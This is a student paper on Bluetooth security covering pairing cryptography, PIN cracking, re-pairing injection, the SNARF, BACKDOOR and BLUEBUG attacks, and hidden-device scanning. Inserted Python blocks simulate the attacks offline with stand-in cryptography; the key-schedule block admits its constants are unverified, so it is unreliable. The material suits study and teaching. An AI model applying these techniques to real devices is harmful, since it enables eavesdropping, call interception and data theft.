bluetooth hacking by indevilscafe


BLUETOOTH HACKING

PRERIT KAPADIA (ID: 185) and ABHAS MANGAL (ID: 183)
Project ID: CV-75

ABSTRACT

Want to immerse your handhelds, laptops or other electronic goodies in the world of Bluetooth? Better think again: are you then really secure? Want to learn more? Then proceed ahead. Here you take a trip through the various procedures by which many different types of attack try their hand at capturing the personal information on your Bluetooth enabled device. But do they really succeed? Find out ahead. We walk through the three steps of the pairing process which any Bluetooth device must follow before transferring data using a PIN, and we point out where the PIN can be cracked in that initial process itself. The encryption algorithm used during the pairing process is also discussed. A dictionary of the different types of attack, and of the malicious tricks they use to gain control over the services provided by Bluetooth enabled devices, is also dealt with in the paper. The various counter-measures needed to prevent our beloved Bluetooth devices from being hacked are suggested. The paper also draws attention to the scanning of Bluetooth addresses, which enables ethical hackers like us to make contact with unknown Bluetooth devices.

What is Bluetooth?

Bluetooth is a wireless technology that enables electronic devices to communicate wirelessly in the 2.4 GHz ISM (licence free) frequency band. It allows devices such as mobile phones, headsets, PDAs and portable computers to communicate and send data to each other without the need for wires or cables to link the devices together. It has been specifically designed as a low cost, low power radio technology, which is particularly suited to the short range Personal Area Network (PAN) application. (It is the design focus on low cost, small size and low power which distinguishes it from the IEEE 802.11 wireless LAN technology.)

The Main Features of Bluetooth:
- Operates in the 2.4 GHz frequency band, which needs no licence for wireless communication.
- Real-time data transfer is usually possible over 10-100 m.
- Close proximity is not required, unlike infrared (IrDA) communication devices, because Bluetooth is not blocked by obstacles such as walls.
- Supports both point-to-point wireless connections without cables, for example between mobile phones and personal computers, as well as point-to-multipoint connections that enable ad hoc local wireless networks.
- Uses the unlicensed ISM (Industrial, Scientific and Medical) band, 2400-2483.5 MHz. Modulation: Gaussian frequency shift keying. Frequency Hopping Spread Spectrum at 1600 hops/sec among 79 channels spaced 1 MHz apart.

When and How was it Conceived?

Bluetooth was originally conceived by Ericsson in 1994, when they began a study to examine alternatives to the cables that linked mobile phone accessories.
Where did the Name Come From?

Bluetooth was named after Harald Blåtand (Harald Bluetooth), a tenth century Danish Viking king who united and controlled large parts of Scandinavia, today's Denmark and Norway. The name was chosen to highlight the potential of the technology to unify the telecommunications and computing industries.

SIG Membership?

Since its original foundation, the Bluetooth SIG has become a not-for-profit trade association, Bluetooth SIG, Inc. Membership is open to all companies wishing to develop, market and promote Bluetooth products, at two levels: Associate and Adopter Members.

Bluetooth Security

2 The Bluetooth pairing & authentication process

The Bluetooth initialization procedure consists of 3 or 4 steps:

    1.   Creation of an initialization key (Kinit).
    2.   Creation of a link key (Kab).
    3.   Authentication.

After the 3 pairing steps are completed, the devices can derive an encryption key to protect all future communication in an optional fourth step.

Before the pairing process can begin, the PIN code must be entered into both Bluetooth devices. Note that in some devices (like wireless earphones) the PIN is fixed and cannot be changed. In such cases, the fixed PIN is entered into the peer device. If two devices both have a fixed PIN, they cannot be paired, and therefore cannot communicate. In the following sections we go into the details of the steps of the pairing process.

2.1.1 Creation of Kinit

The Kinit key is created using the E22 algorithm, whose inputs are:

    1.   a BD_ADDR (a 48 bit Bluetooth device address).
    2.   the PIN code and its length.
    3.   a 128 bit random number IN_RAND.

This algorithm outputs a 128-bit word, which is referred to as the initialization key (Kinit).

Figure 1 describes how Kinit is generated using E22. Note that the PIN code is available at both Bluetooth devices, and the 128 bit IN_RAND is transmitted in plaintext. As for the BD_ADDR: if one of the devices has a fixed PIN, they use the BD_ADDR of the peer device. If both have a variable PIN, they use the BD_ADDR of the slave device, the one that receives the IN_RAND. In Figure 1, if both devices have a variable PIN, BD_ADDRB shall be used. The Bluetooth device address of a peer can be obtained through the inquiry routine; this is usually done before connection establishment begins.

Figure 1: Generation of Kinit using E22

This initialization key (Kinit) is used only during the pairing process. Upon the creation of the link key (Kab), the Kinit key is discarded.

2.1.2 Creation of Kab

After creating the initialization key, the devices create the link key Kab. The devices use the initialization key to exchange two new 128 bit random words, known as LK_RANDA and LK_RANDB. Each device selects a random 128 bit word and sends it to the other device after bitwise xoring it with Kinit. Since both devices know Kinit, each device now holds both random numbers LK_RANDA and LK_RANDB. Using the E21 algorithm, both devices create the link key Kab. The inputs of the E21 algorithm are:

    1.   a BD_ADDR.
    2.   the 128 bit random number (LK_RANDA or LK_RANDB).

Note that E21 is used twice in each device, once with each set of inputs (BD_ADDRA with LK_RANDA, BD_ADDRB with LK_RANDB), and the two outputs are combined into Kab. Figure 2 describes how the link key Kab is created.

Figure 2: Generation of Kab using E21

2.1.3 Mutual authentication

Upon creation of the link key Kab, mutual authentication is performed. This process is based on a challenge-response scheme. One of the devices, the verifier, generates a random 128 bit word called AU_RANDA and sends it in plaintext. The other device, the claimant, calculates a 32 bit word called SRES using the algorithm E1. The claimant sends the 32 bit SRES word as a reply to the verifier, who verifies it by performing the same calculation. If the response word matches, the verifier and the claimant exchange roles and repeat the entire process. Figure 3 describes the process of mutual authentication. The inputs to E1 are:

    1.   The random word AU_RANDA.
    2.   The link key Kab.
    3.   The claimant's own Bluetooth device address (BD_ADDRB).

Note that as a side effect of the authentication process, both peers calculate a 96 bit word called ACO. This word is optionally used during the creation of the encryption key. The creation of this encryption key exceeds our primary discussion and shall not be described in this paper.

Figure 3: Mutual authentication process using E1

Table 1 summarizes the messages exchanged during pairing and authentication. Only messages 2 and 3 are masked at all, and only with Kinit, which is itself derived from the PIN.

Table 1: List of messages sent during the pairing and authentication process. "A" and "B" denote the two Bluetooth devices.

 #   Src   Dst   Data       Length    Notes
 1   A     B     IN_RAND    128 bit   plaintext
 2   A     B     LK_RANDA   128 bit   XORed with Kinit
 3   B     A     LK_RANDB   128 bit   XORed with Kinit
 4   A     B     AU_RANDA   128 bit   plaintext
 5   B     A     SRES       32 bit    plaintext
 6   B     A     AU_RANDB   128 bit   plaintext
 7   A     B     SRES       32 bit    plaintext

2.2 Bluetooth cryptographic primitives

As we described above, the Bluetooth pairing and authentication process uses three algorithms: E22, E21 and E1. All of these algorithms are based on the SAFER+ cipher with some modifications. Here we describe the features of SAFER+ that are relevant to our attack.

2.2.1 Description of SAFER+

SAFER+ is a block cipher with a block size of 128 bits and three different key lengths: 128, 192 and 256 bits. Bluetooth uses SAFER+ with a 128 bit key. In this mode, SAFER+ consists of:

    1.   KSA - a key scheduling algorithm that produces 17 different 128-bit subkeys.
    2.   8 identical rounds.
    3.   An output transformation, implemented as an xor between the output of the last round and the last subkey.

Figure 4 describes the inner design of SAFER+, as it is used in Bluetooth.
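The key scheduling algorithm of item 1, as an added worked example (this is not code from the paper or from the Bluetooth specification): a Python implementation of the SAFER+ KSA for a 128 bit key, with the structure the text describes, a 17 byte key register, every byte rotated left by 3 bits before each subkey is taken, 16 of the 17 bytes selected with a sliding start offset, and a per-subkey bias vector added byte-wise modulo 256. The parity byte, the selection offset and the bias formula are the SAFER+ definition as recalled by the author of this example, so treat them as assumptions to be checked against the specification's test vectors before relying on the exact values.

```python
# Added example: the SAFER+ key scheduling algorithm for a 128 bit key, the KSA used
# inside Bluetooth's E1/E21/E22. Structure as the text describes it: a 17 byte register,
# every byte rotated left by 3 bits per step, 16 of 17 bytes selected, a bias vector added.
# Assumption: the parity byte, the selection offset and the bias formula follow the
# SAFER+ definition as recalled by the author of this example, not copied from the spec.

def rotl8(b, n=3):
    """Rotate a byte left by n positions; the KSA uses n = 3 on every register byte."""
    return ((b << n) | (b >> (8 - n))) & 0xFF


def bias(p, i):
    """Bias byte B_p[i] for subkey p in 2..17 and byte position i in 0..15:
    ((45 ** (45 ** (17p + i + 1) mod 257)) mod 257) mod 256 (assumed formula)."""
    inner = pow(45, 17 * p + i + 1, 257)
    return pow(45, inner, 257) % 256


def safer_plus_key_schedule(key):
    """Return the 17 subkeys K1..K17 (16 bytes each) for a 16 byte SAFER+ key."""
    if len(key) != 16:
        raise ValueError("Bluetooth uses SAFER+ with a 128 bit key")
    parity = 0
    for b in key:
        parity ^= b                       # 17th register byte: xor of the 16 key bytes
    reg = list(key) + [parity]
    subkeys = [bytes(key)]               # K1 is the key itself, unrotated and unbiased
    for p in range(2, 18):
        reg = [rotl8(b) for b in reg]    # one KSA step: rotate every register byte by 3
        # Select 16 of the 17 bytes, starting one byte later for each subkey, and add
        # the bias vector byte-wise mod 256 (without the bias an all-zero key would
        # produce all-zero subkeys).
        subkeys.append(bytes((reg[(p - 1 + i) % 17] + bias(p, i)) % 256
                             for i in range(16)))
    return subkeys


def subkey_usage(subkeys):
    """Map the 17 subkeys to the 8 rounds (two each) and the output transformation."""
    rounds = [(subkeys[2 * r], subkeys[2 * r + 1]) for r in range(8)]  # K1,K2 .. K15,K16
    return rounds, subkeys[16]                                          # K17: final xor


if __name__ == "__main__":
    ks = safer_plus_key_schedule(bytes(range(16)))
    for n, k in enumerate(ks, 1):
        print(f"K{n:<2} {k.hex()}")
```

The test checks two things a reader can verify by hand: the first two bias bytes of K2 come out as 70 and 151 (the exponents 35 and 36 in the formula above), and flipping one key bit shows up in the last byte of K2 through the parity byte, rotated by 3 (a difference of 8).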

Figure 4: Inner design of SAFER+

The key scheduling algorithm (KSA)

The key scheduling algorithm used in SAFER+ produces 17 different 128-bit subkeys, denoted K1 to K17. Each SAFER+ round uses 2 subkeys, and the last key is used in the SAFER+ output transformation. The important details for our discussion are that in each step of the KSA, each byte of the key register is cyclically rotated left by 3 bit positions, and 16 bytes (out of 17) are selected for the output subkey. In addition, a 128 bit bias vector, different in each step, is added to the selected output bytes.

The SAFER+ Round

As depicted, SAFER+ consists of 8 identical rounds. Each round calculates a 128 bit word out of two subkeys and the 128 bit input word from the previous round.

3 Bluetooth PIN Cracking

3.1 The Basic Attack

Assume that the attacker eavesdropped on an entire pairing and authentication process, and saved all the messages (see Table 1). The attacker can now use a brute force algorithm to find the PIN used. The attacker enumerates all possible values of the PIN. Knowing IN_RAND and the BD_ADDR, the attacker runs E22 with those inputs and the guessed PIN, and obtains a hypothesis for Kinit. The attacker can now use this hypothesis of the initialization key to decode messages 2 and 3. Messages 2 and 3 contain enough information to perform the calculation of the link key Kab, giving the attacker a hypothesis of Kab. The attacker now uses the data in the last 4 messages to test the hypothesis: using Kab and the transmitted AU_RANDA (message 4), the attacker calculates SRES and compares it to the data of message 5. If necessary, the attacker can use the values of messages 6 and 7 to re-verify the hypothesis of Kab. This is repeated until the correct PIN is found. Figure 6 describes the entire process of PIN cracking.

Note that the attack, as described, is only fully successful against PIN values of under 64 bits. If the PIN is longer, then with high probability there will be multiple PIN candidates, since the two SRES values only provide 64 bits of data to test against. A 64 bit PIN is equivalent to a 19 decimal digit PIN.
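The complete exchange of Table 1 followed by the brute-force search of section 3.1, as an added example (this is not code from the paper or from the Bluetooth specification). Implementing the SAFER+ based E22/E21/E1 is out of scope here, so the three functions are replaced by an HMAC-SHA256 stand-in with the same interface (same inputs, 128 bit output, 32 bit SRES); the attack does not depend on their internals, only on what crosses the air in the clear. The two BD_ADDRs and the 4 digit PIN are constructed sample values. The script pairs two devices, records the seven messages exactly as an eavesdropper would, and recovers the PIN and the link key from the transcript alone.

```python
# Added example: Bluetooth pairing/authentication transcript and the PIN brute-force
# attack of section 3.1. E22/E21/E1 are HMAC-SHA256 stand-ins (assumption), not the
# real SAFER+ based primitives; BD_ADDRs and the PIN below are constructed sample values.
import hashlib
import hmac
import itertools
import os


def _e(label, *parts):
    """Stand-in for the SAFER+ based E-functions: keyed PRF with a 128 bit output."""
    return hmac.new(label, b"".join(parts), hashlib.sha256).digest()[:16]


def e22(bd_addr, pin, in_rand):
    """Kinit = E22(BD_ADDR, PIN, len(PIN), IN_RAND)."""
    return _e(b"E22", bd_addr, pin, bytes([len(pin)]), in_rand)


def e21(bd_addr, lk_rand):
    """Half link key = E21(BD_ADDR, LK_RAND); run once per device."""
    return _e(b"E21", bd_addr, lk_rand)


def e1(kab, au_rand, bd_addr):
    """Returns (SRES, ACO): 32 bit response and 96 bit authenticated ciphering offset."""
    out = _e(b"E1", kab, au_rand, bd_addr)
    return out[:4], out[4:16]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def pair_and_authenticate(pin, addr_a, addr_b, rnd=os.urandom):
    """Run the seven messages of Table 1 between A (master) and B (slave).

    Returns (Kab, transcript); the transcript is exactly what an eavesdropper sees."""
    in_rand = rnd(16)                                     # msg 1: IN_RAND in plaintext
    # Both devices have a variable PIN, so the slave's address BD_ADDRB goes into E22.
    kinit = e22(addr_b, pin, in_rand)
    lk_rand_a, lk_rand_b = rnd(16), rnd(16)
    msg2, msg3 = xor(lk_rand_a, kinit), xor(lk_rand_b, kinit)  # msgs 2, 3: masked with Kinit
    kab = xor(e21(addr_a, lk_rand_a), e21(addr_b, lk_rand_b))  # E21 twice, outputs xored
    au_rand_a = rnd(16)                                   # msg 4: A challenges B
    sres_b, _ = e1(kab, au_rand_a, addr_b)                # msg 5: B's response
    au_rand_b = rnd(16)                                   # msg 6: B challenges A
    sres_a, _ = e1(kab, au_rand_b, addr_a)                # msg 7: A's response
    return kab, [in_rand, msg2, msg3, au_rand_a, sres_b, au_rand_b, sres_a]


def crack_pin(transcript, addr_a, addr_b, pin_len=4):
    """Section 3.1: enumerate PINs, rebuild Kinit and Kab, test against both SRES values.

    Returns (pin, Kab, number of candidates tested) or None if no PIN fits."""
    in_rand, msg2, msg3, au_rand_a, sres_b, au_rand_b, sres_a = transcript
    for n, digits in enumerate(itertools.product("0123456789", repeat=pin_len), 1):
        pin = "".join(digits).encode()
        kinit = e22(addr_b, pin, in_rand)                           # hypothesis for Kinit
        lk_rand_a, lk_rand_b = xor(msg2, kinit), xor(msg3, kinit)   # unmask msgs 2 and 3
        kab = xor(e21(addr_a, lk_rand_a), e21(addr_b, lk_rand_b))   # hypothesis for Kab
        # 32 bits of check from message 5 plus 32 from message 7: 64 bits in total, which
        # is why PINs longer than 64 bits leave several candidates.
        if e1(kab, au_rand_a, addr_b)[0] == sres_b and e1(kab, au_rand_b, addr_a)[0] == sres_a:
            return pin.decode(), kab, n
    return None


# Constructed sample values: two BD_ADDRs and a factory-style 4 digit PIN.
ADDR_A = bytes.fromhex("000AD9EB66C7")
ADDR_B = bytes.fromhex("00027211AABB")
PIN = b"4711"

if __name__ == "__main__":
    real_kab, transcript = pair_and_authenticate(PIN, ADDR_A, ADDR_B)
    pin, kab, tried = crack_pin(transcript, ADDR_A, ADDR_B)
    print(f"PIN {pin} recovered after {tried} candidates; link key match: {kab == real_kab}")
```

Note that the search succeeds without ever touching the devices: every input to the hypothesis test (IN_RAND, the masked LK_RANDs, both AU_RANDs, both SRES values and both addresses) is in the transcript. Trying the wrong PIN length never matches, because the PIN length is an input of E22.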
Figure 6: The Basic Attack Structure.

4 The Re-Pairing attack

4.1 Background and motivation

This section describes an additional attack on Bluetooth devices that is useful when used in conjunction with the primary attack described in Section 3. Recall that the primary attack is only applicable if the attacker has eavesdropped on the entire process of pairing and authentication. This is a major limitation, since the pairing process is rarely repeated. Once the link key Kab is created, each Bluetooth device stores it for possible future communication with the peer device. If at a later point in time the device initiates communication with the same peer, the stored link key is used and the pairing process is skipped. Our second attack exploits the connection establishment protocol to force the communicating devices to repeat the pairing process. This allows the attacker to record all the messages and crack the PIN using the primary attack described in this paper.

4.2 Attack details

Assume that two Bluetooth devices that have already been paired before now intend to establish communication again. This means that they don't need to create the link key Kab again, since they have already created and stored it. They proceed directly to the authentication phase (recall Figure 3). We describe three different methods that can be used to force the devices to repeat the pairing process. The efficiency of each method depends on the implementation of the Bluetooth core in the device under attack. These methods appear in order of efficiency:

    1.   Since the devices skipped the pairing process and proceeded directly to the authentication phase, the master device sends the slave an AU_RAND message, and expects the SRES message in return. Note that the Bluetooth specification allows a Bluetooth device to forget a link key. In such a case, the slave sends an LMP_not_accepted message in return, to let the master know it has forgotten the link key. Therefore, after the master device has sent the AU_RAND message to the slave, the attacker injects an LMP_not_accepted message toward the master. The master will be convinced that the slave has lost the link key and pairing will be restarted. Restarting the pairing procedure causes the master to discard the link key. This assures that pairing must be done before the devices can authenticate again.
    2.   At the beginning of the authentication phase, the master device is supposed to send the AU_RAND to the slave. If, before it does so, the attacker injects an IN_RAND message toward the slave, the slave device will be convinced that the master has lost the link key and pairing is restarted. This will cause the connection establishment to restart.
    3.   During the authentication phase, the master device sends the slave an AU_RAND message, and expects an SRES message in return. If, after the master has sent the AU_RAND
         message, an attacker injects a random SRES message toward the master, this will cause the authentication phase to restart, and repeated attempts will be made. At some point, after a certain number of failed authentication attempts, the master device is expected to declare that the authentication procedure has failed (this is implementation dependent) and initiate pairing.
    4.   The three methods described above cause one of the devices to discard its link key. This assures that the pairing process will occur during the next connection establishment, so the attacker will be able to eavesdrop on the entire process and use the method described in Section 3 to crack the PIN.

In order to make the attack "online", the attacker can save all the messages transferred between the devices after the pairing is complete. After breaking the PIN (0.06-0.3 sec for a 4 digit PIN), the attacker can decode the saved messages, and continue to eavesdrop and decode the communication on the fly. Since Bluetooth supports a bit rate of 1 Megabit per second, a 40 KB buffer is more than enough for the common case of a 4 digit PIN.

Notes:

    1.   The Bluetooth specification does allow devices to forget link keys and to require repeating the pairing process. This fact makes the re-pairing attack applicable.
    2.   Re-pairing is an active attack that requires the attacker to inject a specific message at a precise point in the protocol. This most likely needs a custom Bluetooth device, since off-the-shelf components will be unable to support such behaviour.
    3.   If the slave device verifies that the message it receives is from the correct BD_ADDR, then the attack requires the injected message to have its source BD_ADDR "spoofed", again requiring custom hardware.
    4.   If the attack is successful, the Bluetooth user will need to enter the PIN again, so a suspicious user may realize that his Bluetooth device is under attack and refuse to enter the PIN.

5 Countermeasures

This section details the countermeasures one should consider when using a Bluetooth device. These countermeasures reduce the probability of being subjected to both attacks and the exposure to them.

1. Since Bluetooth is a wireless technology, it is very difficult to prevent Bluetooth signals from leaking outside the desired boundaries. Therefore, one should follow the recommendation in the Bluetooth standard and pair, that is, enter the PIN into the Bluetooth device, as rarely as possible, and preferably not in a public place. This reduces the risk of an attacker eavesdropping on the pairing process and finding the PIN used.

Most Bluetooth devices save the link key (Kab) in non-volatile memory for future use. This way, when the same Bluetooth devices wish to communicate again, they use the stored link key. However, there is another mode of work which requires entering the PIN into both devices every time they wish to communicate, even if they have already been paired before. This mode gives a false sense of security! Starting the pairing process every time increases the probability of an attacker eavesdropping on the messages transferred. We suggest not using this mode of work.

2. The PIN length ranges from 8 to 128 bits. Most manufacturers use a 4 digit PIN and supply it with the device. Obviously, customers should demand the ability to use longer PINs, since the basic attack is a brute force search over the PIN space.

3. Instead of passing the pairing and authentication messages in plaintext, they should be protected before transmission.

The Future of Bluetooth

The next version of Bluetooth, currently code named Lisbon, includes a number of features to increase the security, usability and value of Bluetooth. The following features are defined:

    -    Atomic Encryption Change
    -    Extended Inquiry Response
    -    Sniff Subrating
    -    QoS Improvements
    -    Simple Pairing
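Returning to the three injection methods of section 4.2, here they are as an added message-level simulation (this is not code from the paper, and it is a model of the master's connection-establishment logic, not of any real Bluetooth stack). Message names follow the text (AU_RAND, SRES, IN_RAND, LMP_not_accepted); SRES is computed with a keyed-hash stand-in for E1; the failed-attempt limit used by method 3 is a made-up value, since the text says it is implementation dependent; the two addresses are constructed. Each method ends with one side having discarded its link key, which is the state in which the next connection must run the pairing of Table 1 in the clear.

```python
# Added example: the three re-pairing injections of section 4.2 as a message-level
# simulation of the master's connection-establishment logic. Model assumptions: message
# names follow the text; SRES uses a keyed-hash stand-in instead of E1; the failed-attempt
# threshold of method 3 is a made-up value (the text says it is implementation dependent).
import hashlib
import hmac
import os

MAX_AUTH_FAILURES = 3   # assumed implementation-dependent limit relied on by method 3


def sres(link_key, au_rand, bd_addr):
    """Stand-in for E1: 32 bit response to a challenge under the shared link key."""
    return hmac.new(link_key, au_rand + bd_addr, hashlib.sha256).digest()[:4]


class Device:
    """Minimal peer: holds a stored link key for one partner and answers LMP messages."""

    def __init__(self, bd_addr, link_key):
        self.bd_addr = bd_addr
        self.link_key = link_key
        self.log = []            # what the device did, for inspection

    def handle(self, msg, payload=None):
        """Process one incoming LMP message; returns the reply (name, payload) or None."""
        if msg == "AU_RAND":
            if self.link_key is None:            # spec allows a device to forget its key
                return ("LMP_not_accepted", None)
            return ("SRES", sres(self.link_key, payload, self.bd_addr))
        if msg == "IN_RAND":
            # A peer that starts pairing has no link key for us: drop ours (method 2).
            self.log.append("pairing requested by peer, link key discarded")
            self.link_key = None
            return ("LMP_accepted", None)
        if msg == "LMP_not_accepted":
            # Peer says it forgot the key (method 1): forget ours, pairing must follow.
            self.log.append("peer lost link key, link key discarded")
            self.link_key = None
        return None


def connect(master, slave, peer_addr, inject=None):
    """Master-initiated connection establishment with stored keys.

    `inject(step, msg)` lets an attacker substitute the message in flight at one of two
    points; returns 'authenticated' or 'pairing' (pairing would now run in the clear)."""
    inject = inject or (lambda step, m: m)
    failures = 0
    while True:
        if master.link_key is None or slave.link_key is None:
            return "pairing"
        au_rand = os.urandom(16)
        # "to_slave": the attacker may put an IN_RAND in front of the AU_RAND (method 2).
        reply = slave.handle(*inject("to_slave", ("AU_RAND", au_rand)))
        # "to_master": the attacker may replace the slave's reply (methods 1 and 3).
        reply = inject("to_master", reply)
        if reply[0] == "LMP_not_accepted":
            master.handle("LMP_not_accepted")
            continue
        if reply[0] != "SRES":
            continue                        # establishment restarts; slave has no key now
        if reply[1] == sres(master.link_key, au_rand, peer_addr):
            return "authenticated"
        failures += 1                       # wrong SRES: retry, which method 3 exploits
        if failures >= MAX_AUTH_FAILURES:
            master.log.append("authentication failed, restarting pairing")
            master.link_key = None


def method1(step, m):   # inject LMP_not_accepted toward the master after its AU_RAND
    return ("LMP_not_accepted", None) if step == "to_master" else m


def method2(step, m):   # inject IN_RAND toward the slave before the AU_RAND arrives
    return ("IN_RAND", os.urandom(16)) if step == "to_slave" else m


def method3(step, m):   # inject a random SRES toward the master, repeatedly
    return ("SRES", os.urandom(4)) if step == "to_master" else m


ADDR_A = bytes.fromhex("000AD9EB66C7")   # constructed master address
ADDR_B = bytes.fromhex("00027211AABB")   # constructed slave address


def run(method=None):
    """Fresh pair of devices sharing a stored link key; returns (outcome, master log, slave log)."""
    kab = os.urandom(16)
    master, slave = Device(ADDR_A, kab), Device(ADDR_B, kab)
    outcome = connect(master, slave, slave.bd_addr, method)
    return outcome, master.log, slave.log


if __name__ == "__main__":
    for name, m in [("no attacker", None), ("method 1", method1),
                    ("method 2", method2), ("method 3", method3)]:
        print(name, run(m))
```

The logs show which side the injected message acts on: method 1 and method 3 make the master discard its key, method 2 makes the slave discard its key. Note 3 of the text applies to all three: a stack that checks the source BD_ADDR of the injected message forces the attacker to spoof it.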
Types of attacks in Bluetooth

The SNARF attack:
It is possible, on some makes of device, to connect to the device without alerting the owner of the target device to the request, and gain access to restricted portions of the data stored therein, including the entire phonebook (and any images or other data associated with the entries), calendar, real-time clock, business card, properties, change log and IMEI (International Mobile Equipment Identity [6], which uniquely identifies the phone to the mobile network and is used in illegal phone "cloning"). This is normally only possible if the device is in "discoverable" or "visible" mode, but there are tools available on the Internet that allow even this safety net to be bypassed.

The BACKDOOR attack:
The backdoor attack involves establishing a trust relationship through the "pairing" mechanism, but ensuring that it no longer appears in the target's register of paired devices. In this way, unless the owner is actually observing their device at the precise moment a connection is established, they are unlikely to notice anything, and the attacker is free to use any resource that a trusted relationship with that device grants access to. This means that not only can data be retrieved from the phone, but other services, such as modems or Internet, WAP and GPRS gateways, may be accessed without the owner's knowledge or consent. Indications are that once the backdoor is installed, the above SNARF attack will function on devices that previously denied access, and without the restrictions of a plain SNARF attack, so we strongly suspect that the other services will prove to be available also.

The BLUEBUG attack:
The bluebug attack creates a serial profile connection to the device, thereby giving full access to the AT command set, which can then be exploited using standard off-the-shelf tools, such as PPP for networking and gnokii for messaging, contact management, diverts and initiating calls. With this facility, it is possible to use the phone to initiate calls to premium rate numbers, send SMS messages, read SMS messages, connect to data services such as the Internet, and even monitor conversations in the vicinity of the phone. This last is done via a voice call over the GSM network, so the listening post can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, allowing the owner's incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim.

Scanning for Bluetooth addresses

The Bluetooth address itself is a unique 48 bit device identifier, where the first 3 bytes of the address are assigned to a specific manufacturer by the IEEE, and the last 3 bytes are freely allocated by the manufacturer. For example, the hexadecimal representation of a Sony Ericsson P900 phone's Bluetooth address may look like 00:0A:D9:EB:66:C7, where the first 3 bytes of this address (00:0A:D9) are registered to Sony Ericsson by the IEEE, meaning that all P900 phones will have a Bluetooth address starting with the same 3 bytes. The last 3 bytes (EB:66:C7) of the sample address are assigned to this device by Sony Ericsson and should be different for each P900 phone, but unfortunately are not always.

In theory, enabling the non-discoverable mode on a Bluetooth device should protect users from unauthorized connections, yet in practice it is still quite possible to find these devices. There are software tools available which allow brute-force discovery of non-discoverable devices. An example of such an application is RedFang by Ollie Whitehouse, a small application which simply tries to connect to each Bluetooth address in turn, until a hidden device answers the request sent to its particular address. In the author's initial tests, a minimum of 6 seconds per address was needed to achieve a good level of accuracy (it varies from 2.5 to 10 seconds on average). It is certainly possible to find a hidden device in less than 3 seconds. The address space behind one manufacturer prefix has 2^24 = 16,777,216 possible addresses. If we assume 6 seconds are required per address, the total scan would take 1165 days, meaning we would need more than 3 years to discover all hidden Sony Ericsson phones in a conference room.

With the advancement of digital convergence and M-commerce, the use of Bluetooth to connect different devices is going to be significant. But to make communication more secure, advancement in security must not be neglected.
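For the "Scanning for Bluetooth addresses" section, an added example (not code from the paper and not RedFang itself) that works through the address structure and the brute-force discovery loop offline: it parses a BD_ADDR into the IEEE prefix and the manufacturer-assigned part, enumerates the 2^24 addresses behind one prefix, computes the sweep time at the 6 seconds per probe figure from the text, and runs a RedFang-style search against a constructed set of "hidden" devices in place of real HCI connection attempts. The prefix, the hidden device set and the probe function are assumptions.

```python
# Added example: RedFang-style brute-force discovery of non-discoverable devices,
# simulated offline. The BD_ADDR structure (3 byte IEEE prefix + 3 byte device part)
# and the 6 s per probe figure come from the text; the hidden device set and the probe
# function are constructed stand-ins for real HCI connection attempts.
from typing import Callable, Iterator, Optional, Set, Tuple


def parse_bd_addr(text: str) -> bytes:
    """'00:0A:D9:EB:66:C7' -> 6 raw bytes; rejects malformed addresses."""
    parts = text.split(":")
    if len(parts) != 6 or not all(len(p) == 2 for p in parts):
        raise ValueError(f"bad BD_ADDR: {text!r}")
    return bytes(int(p, 16) for p in parts)


def fmt_bd_addr(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def split_bd_addr(raw: bytes) -> Tuple[bytes, bytes]:
    """Return (manufacturer prefix assigned by the IEEE, device part), 3 bytes each."""
    return raw[:3], raw[3:]


def addresses_with_prefix(prefix: bytes, start: int = 0, stop: int = 1 << 24) -> Iterator[bytes]:
    """Enumerate the 2^24 addresses under one prefix (or the sub-range [start, stop))."""
    for n in range(start, stop):
        yield prefix + n.to_bytes(3, "big")


def scan_time_days(addresses: int, seconds_per_probe: float = 6.0) -> float:
    """Worst-case wall-clock time for probing every address once."""
    return addresses * seconds_per_probe / 86400


def brute_force_hidden(prefix: bytes, probe: Callable[[bytes], bool],
                       stop_after: int = 1 << 24) -> Tuple[Optional[str], int]:
    """Probe addresses under `prefix` in order until one answers; returns (addr, probes)."""
    probes = 0
    for addr in addresses_with_prefix(prefix, 0, stop_after):
        probes += 1
        if probe(addr):
            return fmt_bd_addr(addr), probes
    return None, probes


# Constructed sample: two hidden phones under the Sony Ericsson prefix quoted in the text.
HIDDEN_DEVICES: Set[bytes] = {
    parse_bd_addr("00:0A:D9:00:00:2A"),
    parse_bd_addr("00:0A:D9:EB:66:C7"),
}


def fake_probe(addr: bytes) -> bool:
    """Stand-in for an HCI connection attempt: True if a hidden device answers."""
    return addr in HIDDEN_DEVICES


if __name__ == "__main__":
    prefix, device = split_bd_addr(parse_bd_addr("00:0A:D9:EB:66:C7"))
    print("prefix", fmt_bd_addr(prefix), "device part", fmt_bd_addr(device))
    print(f"full sweep of one prefix at 6 s/probe: {scan_time_days(1 << 24):.0f} days")
    found, probes = brute_force_hidden(prefix, fake_probe)
    print(f"first hidden device {found} after {probes} probes "
          f"(about {probes * 6 / 60:.1f} minutes at 6 s/probe)")
```

The sweep figure reproduces the 1165 days of the text for a whole prefix; the search itself shows why the attack is still practical in the field, since a device whose manufacturer hands out the low part of the address space sequentially (the text notes the last 3 bytes are not always unique, let alone random) answers after far fewer probes than the worst case.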